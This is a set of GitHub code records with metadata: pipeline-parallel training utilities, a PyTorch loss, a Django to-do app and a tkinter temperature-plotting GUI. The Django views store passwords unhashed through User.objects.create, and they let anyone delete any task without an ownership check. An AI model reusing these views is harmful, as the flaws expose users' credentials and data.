the reminder\n #\n # Note: (1) only effects the last batch so there is no problem with staleness.\n\n reminder_micro_batches = train_batches_limit_to_use % args.step_every\n if reminder_micro_batches:\n if step_every_smaller_last_batch_policy == SmallerLastBatchPolicy.DropReminder:\n # d_info = {\n # \"steps_left\": steps_left,\n # \"batches_left\": batches_left,\n # 
\"original_train_batches_limit\": train_batches_limit,\n # \"train_batches_limit_until_flush\": train_batches_limit_to_use,\n # \"step_every\": args.step_every,\n # \"train_dl_len\": train_dl_len\n # }\n logger.info(\n f\"Got reminder of {reminder_micro_batches} micro batches. Will drop them.\")\n train_batches_limit_to_use -= reminder_micro_batches\n\n elif step_every_smaller_last_batch_policy == SmallerLastBatchPolicy.ProportionalStep:\n # TODO: to fix GPipe MPI, we can do it, but needs to be only for last batch.\n logger.info(\n f\"Got reminder of {reminder_micro_batches} micro batches. \"\n f\"Will take proportional {reminder_micro_batches / args.step_every} last step\")\n else:\n raise NotImplementedError(\n f\"Unknown SMALLER_LAST_BATCH_POLICY, {step_every_smaller_last_batch_policy}\")\n else:\n train_batches_limit_to_use = train_batches_limit\n reminder_micro_batches = 0\n return reminder_micro_batches, train_batches_limit_to_use\n\n\ndef approximate_checkpoint_every_x_epochs(args, train_dl_len):\n save_checkpoint_every_x_epochs = getattr(args, \"save_checkpoint_every_x_steps\", None)\n approx_step_per_epoch = train_dl_len // args.step_every\n if save_checkpoint_every_x_epochs is not None:\n save_checkpoint_every_x_epochs = save_checkpoint_every_x_epochs // approx_step_per_epoch\n else:\n save_checkpoint_every_x_epochs = 1\n assert save_checkpoint_every_x_epochs >= 1\n print(f\"Approximating: An epoch is approx {approx_step_per_epoch} steps.\")\n print(f\"Approximating: will save checkpoint every {save_checkpoint_every_x_epochs} epochs, and at the end.\")\n return save_checkpoint_every_x_epochs\n\n\ndef should_stop_early(args, valid_loss, logger):\n # skip check if no validation was done in the current epoch\n if valid_loss is None:\n return False\n if args.patience <= 0:\n return False\n\n def is_better(a, b):\n return a > b if getattr(args, \"maximize_best_checkpoint_metric\",\n False) else a < b\n\n prev_best = getattr(should_stop_early, \"best\", None)\n if prev_best is None or is_better(valid_loss, prev_best):\n should_stop_early.best = valid_loss\n should_stop_early.num_runs = 0\n return False\n else:\n should_stop_early.num_runs += 1\n if should_stop_early.num_runs >= args.patience:\n logger.info(\n f\"early stop since valid performance hasn't improved for last {args.patience} runs\")\n return True\n else:\n return False\n\n\nclass CheckpointsSaver:\n def __init__(self, args):\n self.args = args\n self.num_saved_checkpoints = 0\n\n if getattr(args, \"save_checkpoints\", False):\n assert hasattr(args, \"checkpoints_save_dir\")\n os.makedirs(args.checkpoints_save_dir, exist_ok=True)\n else:\n print(\"-W- will not save checkpoints\")\n # (To change this, set: args.save_checkpoints=True, args.checkpoints_save_dir\")\n\n def maybe_save_checkpoint(self, model, steps):\n args = self.args\n if not getattr(args, \"save_checkpoints\", False):\n return\n\n name_prefix = getattr(args, \"checkpoints_save_name_prefix\", \"\")\n name_prefix += f\"_{self.num_saved_checkpoints}\"\n # name_prefix += add_to_prefix\n fn = os.path.join(args.checkpoints_save_dir, f\"{name_prefix}_Partition{args.stage}.pt\")\n\n tik = time.time()\n torch.save(model.state_dict(), fn)\n tok = time.time()\n\n print(f\"-V- stage {args.stage}: saving checkpoint took: {tok - tik}\")\n self.num_saved_checkpoints += 1\n print(f\"-I- stage {args.stage}: model checkpoint saved: {fn}\")\n\n # Also save number of steps\n metatdata_fn = os.path.join(args.checkpoints_save_dir, f\"{name_prefix}_Partition{args.stage}.steps\")\n 
try:\n            # We don't want it to kill training if it fails somehow\n            with open(metatdata_fn, \"w\") as f:\n                f.write(str(steps))\n        except Exception as _:\n            warnings.warn(f\"Failed to save metadata for checkpoint {metatdata_fn}, ignoring exception\")\n", "repo_name": "saareliad/FTPipe", "sub_path": "pipe/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 13333, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 41, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pipe.pipeline.SinglePartitionManager", "line_number": 14, "usage_type": "name"}, {"api_name": "pipe.pipeline.trainers.statistics.Stats", "line_number": 14, "usage_type": "name"}, {"api_name": "pipe.prepare_pipeline.DEFAULT_STEP_EVERY_SMALLER_LAST_BATCH_POLICY", "line_number": 18, "usage_type": "argument"}, {"api_name": "warnings.warn", "line_number": 37, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 63, "usage_type": "call"}, {"api_name": "time.time", "line_number": 77, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "time.time", "line_number": 127, "usage_type": "call"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy.DropReminder", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy", "line_number": 138, "usage_type": "name"}, {"api_name": "math.floor", "line_number": 140, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 142, "usage_type": "call"}, {"api_name": "time.time", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.distributed.broadcast", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.distributed", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy.DropReminder", "line_number": 215, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy", "line_number": 215, "usage_type": "name"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy.ProportionalStep", "line_number": 228, "usage_type": "attribute"}, {"api_name": "pipe.prepare_pipeline.SmallerLastBatchPolicy", "line_number": 228, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 301, "usage_type": "call"}, {"api_name": "os.path", "line_number": 301, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 303, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 304, "usage_type": "call"}, {"api_name": "time.time", "line_number": 305, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 312, "usage_type": "call"}, {"api_name": "os.path", "line_number": 312, "usage_type": "attribute"}, {"api_name": "warnings.warn", "line_number": 318, "usage_type": "call"}]}
+{"seq_id": "11351989590", "text": "import torch\nfrom torch import nn\n\nclass Deid_loss(nn.Module): # Deid loss\n    def __init__(self,wt1,wt2):\n        super(Deid_loss,self).__init__()\n        self.wt1 = wt1\n        self.wt2 = wt2\n        return\n\n    def forward(self, preds, labels): # tensor [Batch, Temporal]\n        batch_size = preds.size()[0]\n        term1= -torch.mean(torch.sum(labels.view(batch_size, -1) * torch.log(preds.view(batch_size, -1)), dim=1))\n        # print(term1)\n        # exit()\n        term2 = 
torch.sqrt(torch.sum(preds*preds,1))\n        lossid = self.wt1*torch.mean(term1) #+ self.wt2*torch.mean(term2)\n        return lossid\n", "repo_name": "marukosan93/De-id_rPPG", "sub_path": "utils/Loss_deid.py", "file_name": "Loss_deid.py", "file_ext": "py", "file_size_in_byte": 620, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.log", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.mean", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "29055027537", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render,redirect,get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as LogIn\nfrom django.contrib.auth import logout as LogOut\nfrom myapp.forms import TaskForm\nfrom myapp.models import Tasks\n# Create your views here.\n\ndef index(request):\n    if request.user.is_authenticated:\n        tasklu=Tasks.objects.filter(owner=request.user)\n    else:\n        tasklu=\"no\"\n    return render(request,'myapp/index.html',{'tasks':tasklu})\n\ndef signin(request):\n    if request.method==\"POST\":\n        try:\n            user = User.objects.create(\n                username=request.POST.get(\"username\"),\n                password=request.POST.get(\"password\"),\n                email=request.POST.get(\"email\"),\n                first_name=request.POST.get(\"first_name\"),\n                last_name=request.POST.get(\"last_name\")\n            )\n            user.save()\n        except:\n            return HttpResponse(\"Username Already Taken Please Try Unique Name\")\n        if user:\n            return render(request,'myapp/index.html')\n        else:\n            return render(request,'myapp/index.html',{'username':False})\n    return render(request,'myapp/signin.html')\n\ndef login(request):\n    if not request.user.is_authenticated:\n        if request.method==\"POST\":\n            use=authenticate(username=request.POST.get('username'),password=request.POST.get('password'))\n            if use:\n                LogIn(request,use)\n                return index(request)\n            else:\n                return HttpResponse(\"Log in Failed\")\n        else:\n            return render(request,'myapp/index.html')\n    return render(request,'myapp/login.html')\n\ndef logout(request):\n    LogOut(request)\n    return login(request)\n\ndef add_task(request):\n    if request.user.is_authenticated:\n        form=TaskForm()\n        if request.method==\"POST\":\n            form=TaskForm(request.POST)\n            if form.is_valid():\n                Tasks.objects.create(owner=request.user,title=request.POST.get('title'),deadline=request.POST.get('deadline'))\n                Tasks.save\n                return index(request)\n            else:\n                form=TaskForm()\n    else:\n        return render(request,'myapp/create_task.html',{'form':form})\n\ndef delete_task(request,pk=None):\n    if(request.method==\"POST\"):\n        obj=get_object_or_404(Tasks,pk=pk)\n        obj.delete()\n        return index(request)\n    else:\n        return render(request,'myapp/delete_task.html')", "repo_name": "jyothikiran843/todo", "sub_path": "myapp/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2574, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "myapp.models.Tasks.objects.filter", "line_number": 13, "usage_type": "call"}, 
{"api_name": "myapp.models.Tasks.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "myapp.models.Tasks", "line_number": 13, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 21, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 35, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 42, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 45, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 51, "usage_type": "call"}, {"api_name": "myapp.forms.TaskForm", "line_number": 56, "usage_type": "call"}, {"api_name": "myapp.forms.TaskForm", "line_number": 58, "usage_type": "call"}, {"api_name": "myapp.models.Tasks.objects.create", "line_number": 60, "usage_type": "call"}, {"api_name": "myapp.models.Tasks.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "myapp.models.Tasks", "line_number": 60, "usage_type": "name"}, {"api_name": "myapp.models.Tasks.save", "line_number": 61, "usage_type": "attribute"}, {"api_name": "myapp.models.Tasks", "line_number": 61, "usage_type": "name"}, {"api_name": "myapp.forms.TaskForm", "line_number": 64, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 70, "usage_type": "call"}, {"api_name": "myapp.models.Tasks", "line_number": 70, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "4769250327", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 11 22:46:07 2020\n\n@author: kookil\n\"\"\"\n\nfrom tkinter import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tkinter.messagebox import *\nfrom pandas import DataFrame\nfrom tkinter import ttk\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score\nimport statsmodels.api as sm\n\n\ndef get_info(): \n location = r'754stations_infos.xlsx'\n r1=pd.read_table(\"max.txt\",sep=\"\\s+\")\n r2=pd.read_table(\"min.txt\",sep=\"\\s+\")\n r3=pd.read_table(\"平均.txt\",sep=\"\\s+\")\n st_list=[]\n s1=comvalue1.get()\n s2=comvalue2.get()\n s3=comvalue3.get()\n if s1=='' and s2=='' and s3=='':\n showinfo('提醒','请至少选择一个站台')\n if s1==s2 or s1==s3 or s2==s3:\n showinfo('提醒','请选择不同的站台')\n else:\n df = pd.read_excel(location, 0)\n num1=df[df['站名']==s1]\n a1=num1['序号']\n k1=a1.values\n num2=df[df['站名']==s2]\n a2=num2['序号']\n k2=a2.values\n s3=df[df['站名']==s3]\n a3=s3['序号']\n k3=a3.values\n k_list=np.r_[k1,k2,k3]\n for k in k_list:\n st_name='st'+str(k)\n st_list.append(st_name)\n df1=DataFrame(r1[st_list])\n 
df2=DataFrame(r2[st_list])\n df3=DataFrame(r3[st_list])\n dff=pd.concat([df1,df2,df3],axis=1,ignore_index=True)\n return dff\n \ndef get_zt():\n top = Tk()\n sb = Scrollbar(top)\n sb.pack(side = RIGHT, fill = Y)\n zt= pd.read_excel('754stations_infos.xlsx')\n zt=zt.values\n \n mylist = Listbox(top, yscrollcommand = sb.set )\n for i in range(754):\n mylist.insert(END,zt[i:i+1])\n \n mylist.pack( side = LEFT )\n sb.config( command = mylist.yview )\n \n root.mainloop()\n \n \ndef cal_info(): \n if r.get()==\"月平均日最高温度\":\n m_max()\n if r.get()==\"月平均日最低温度\":\n m_min()\n if r.get()==\"月平均日平均温度\":\n m_avr()\n if r.get()==\"年平均日最高温度\":\n y_max()\n if r.get()==\"年平均日最低温度\":\n y_min()\n if r.get()==\"年平均日平均温度\":\n y_avr()\n \ndef y_min():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][0])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[1+j*3]) \n r1['年份']=l\n d_m=r1.groupby('年份').min()\n x_value=d_m[1+j*3].index\n y_value=d_m[1+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \ndef y_max():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][0])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[0+j*3]) \n r1['年份']=l\n d_m=r1.groupby('年份').max()\n x_value=d_m[0+j*3].index\n y_value=d_m[0+j*3].values\n s.append(y_value)\n pic(x_value,s)\n\n \n\n\ndef y_avr():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][0])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[2+j*3]) \n r1['年份']=l\n d_m=r1.groupby('年份').mean()\n x_value=d_m[2+j*3].index\n y_value=d_m[2+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \n \ndef m_max():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][1])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[0+j*3]) \n r1['月份']=l\n d_m=r1.groupby('月份').max()\n x_value=d_m[0+j*3].index\n y_value=d_m[0+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \n \ndef m_min():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][1])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[1+j*3]) \n r1['月份']=l\n d_m=r1.groupby('月份').min()\n x_value=d_m[1+j*3].index\n y_value=d_m[1+j*3].values\n s.append(y_value)\n pic(x_value,s)\n \n \ndef m_avr():\n dff=get_info()\n l=[]\n s=[]\n for i in range(len(dff.index.values)):\n l.append(dff.index.values[i][1])\n for j in range(int(dff.shape[1]/3)):\n r1=DataFrame(dff[2+j*3]) \n r1['月份']=l\n d_m=r1.groupby('月份').mean()\n x_value=d_m[2+j*3].index\n y_value=d_m[2+j*3].values\n s.append(y_value)\n pic(x_value,s)\n\n\ndef pic(x,y): \n plt.title(\"\")\n if len(x)==12:\n plt.xlabel(\"月份/月\")\n else:\n plt.xlabel(\"年份/年\") \n plt.ylabel(\"温度/℃\")\n plt.rcParams['axes.unicode_minus'] = False\n plt.rcParams[\"font.sans-serif\"]=[\"SimHei\"]\n if len(y)==1:\n plt.plot(x,y[0])\n plt.legend(comvalue1.get())\n elif len(y)==2:\n plt.plot(x,y[0])\n plt.plot(x,y[1])\n plt.legend([comvalue1.get(), comvalue2.get()])\n else:\n plt.plot(x,y[0])\n plt.plot(x,y[1])\n plt.plot(x,y[2])\n plt.legend([comvalue1.get(), comvalue2.get(),comvalue3.get()])\n plt.grid()\n plt.show()\n\ndef yc():\n dff=get_info()\n dff=DataFrame(dff[2])\n Enum=E1.get()\n if Enum=='':\n showinfo(\"警告\",\"请确保年份的输入!\")\n l=[]\n for i in range (len(dff.index)):\n s=dff.index[i][0]\n l.append(s)\n dff['年份']=l\n y_yc1=dff.groupby(\"年份\").mean()\n plt.title(\"mean\")\n plt.rcParams['axes.unicode_minus'] = False\n 
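# Added note (hedged): the forecast below fits an ordinary least-squares line to the yearly mean temperatures and extrapolates it to the user-supplied year, so a purely linear warming trend is assumed.\n    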
plt.rcParams[\"font.sans-serif\"]=[\"SimHei\"]\n plt.scatter(y_yc1.index,y_yc1.values, c='black')\n plt.xlabel(\"年份\")\n plt.ylabel(\"温度\")\n X = y_yc1.index.values.reshape(-1,1)\n y =y_yc1.values.reshape(-1,1)\n reg = LinearRegression()\n reg.fit(X, y)\n print(\"平均气温线性回归方程是: Y = {:.5} + {:.5}X\".format(reg.intercept_[0], reg.coef_[0][0]))\n Enum_r=reg.intercept_[0]+ reg.coef_[0][0]*int(Enum)\n print(\"{}年温度约等于{}度\".format(int(Enum),int(Enum_r)))\n predictions = reg.predict(X)\n plt.plot(y_yc1.index, predictions, c='blue', linewidth=2)\n plt.show()\n \ndef about_call():\n showinfo('帮助','1.月平均指横轴为月份,年平均指横轴为年份。2.每次选择完数据之后需要点击获取数据')\n \nroot = Tk()\nroot.title(\"中国754个站台1960-2018年气温数据处理\") \nlb_sm=Label(root,text=\"请选择1-3个站台\")\nlb_sm.grid(row=0,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_z1=Label(root,text=\"站台1\")\nlb_z1.grid(row=1,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_z2=Label(root,text=\"站台2\")\nlb_z2.grid(row=2,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_z3=Label(root,text=\"站台3\")\nlb_z3.grid(row=3,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nlocation = r'754stations_infos.xlsx'\ndf = pd.read_excel(location, 0)\nsubset = df['站名']\ntuples = subset.values.tolist()\n\ncomvalue1=StringVar()\ncomboxlist1=ttk.Combobox(root,textvariable=comvalue1)\ncomboxlist1[\"values\"]=tuples\ncomboxlist1.grid(row=1,column=1,ipadx=10,ipady=10,padx=10,pady=10)\ncomvalue2=StringVar()\ncomboxlist2=ttk.Combobox(root,textvariable=comvalue2)\ncomboxlist2[\"values\"]=tuples\ncomboxlist2.grid(row=2,column=1,ipadx=10,ipady=10,padx=10,pady=10)\ncomvalue3=StringVar()\ncomboxlist3=ttk.Combobox(root,textvariable=comvalue3)\ncomboxlist3[\"values\"]=tuples\ncomboxlist3.grid(row=3,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nbtn_zt=Button(root,text=\"查看站台数据\",width=20,command=get_zt)\nbtn_zt.grid(row=0,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nr=StringVar()\nradio1 = Radiobutton(root, text=\"月平均日最高温度\", variable=r,value=\"月平均日最高温度\" )\nradio1.grid(row=5,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nradio2 = Radiobutton(root, text=\"月平均日最低温度\", variable=r,value=\"月平均日最低温度\")\nradio2.grid(row=5,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nradio3 = Radiobutton(root, text=\"月平均日平均温度\", variable=r,value=\"月平均日平均温度\")\nradio3.grid(row=6,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nradio4 = Radiobutton(root, text=\"年平均日最高温度\",variable=r,value=\"年平均日最高温度\")\nradio4.grid(row=6,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nradio5 = Radiobutton(root, text=\"年平均日最低温度\",variable=r,value=\"年平均日最低温度\")\nradio5.grid(row=7,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nradio6 = Radiobutton(root, text=\"年平均日平均温度\", variable=r,value=\"年平均日平均温度\")\nradio6.grid(row=7,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nr.set(\"月平均日最高温度\")\n\nbtn_pic=Button(root,text=\"获取数据\",width=20,command=get_info)\nbtn_pic.grid(row=8,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nbtn_pic=Button(root,text=\"作图\",width=20,command=cal_info)\nbtn_pic.grid(row=8,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nlb_yc=Label(root,text=\"请选择1个站台的数据进行平均气温的预测\")\nlb_yc.grid(row=10,column=0,ipadx=10,ipady=10,padx=10,pady=10)\nlb_yc=Label(root,text=\"请输入预测年份\")\nlb_yc.grid(row=11,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nE1 = Entry(root)\nE1.grid(row=11,column=1,ipadx=10,ipady=10,padx=10,pady=10)\n\nbtn_cle=Button(root,text=\"清除界面\",width=20,command=(lambda x=ALL: 
cv.delete(x)))\nbtn_cle.grid(row=12,column=1,ipadx=10,ipady=10,padx=10,pady=10)\nbtn_yc=Button(root,text=\"开始预测\",width=20,command=yc)\nbtn_yc.grid(row=12,column=0,ipadx=10,ipady=10,padx=10,pady=10)\n\nmenu_bar = Menu(root)\nroot.config(menu=menu_bar)\nhelp_menu = Menu(menu_bar, tearoff=0)\nhelp_menu.add_command(label=\"About\",command=about_call)\nmenu_bar.add_cascade(label=\"Help\", menu=help_menu)\n\nroot.mainloop()\n", "repo_name": "kookil/GUI-design-homework", "sub_path": "中国754个站台1960-2018年气温数据处理及根据平均温度对未来天气进行预测/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 9805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_table", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.r_", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 157, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 189, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 190, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 219, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 220, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 220, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 221, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 221, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 233, "usage_type": "name"}, {"api_name": "pandas.read_excel", "line_number": 253, "usage_type": "call"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 258, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 258, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 262, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 262, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 266, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 266, "usage_type": "name"}]} +{"seq_id": "72566506405", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 15 21:46:12 2023\n\n@author: rehan\n\"\"\"\n\nfrom imblearn.over_sampling import RandomOverSampler\nimport numpy as np\nnp.random.seed(1234)\nimport random\nrandom.seed(1234)\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport tqdm\nfrom sklearn.model_selection import train_test_split\n\nimport os\nimport glob\nfrom sklearn.metrics import 
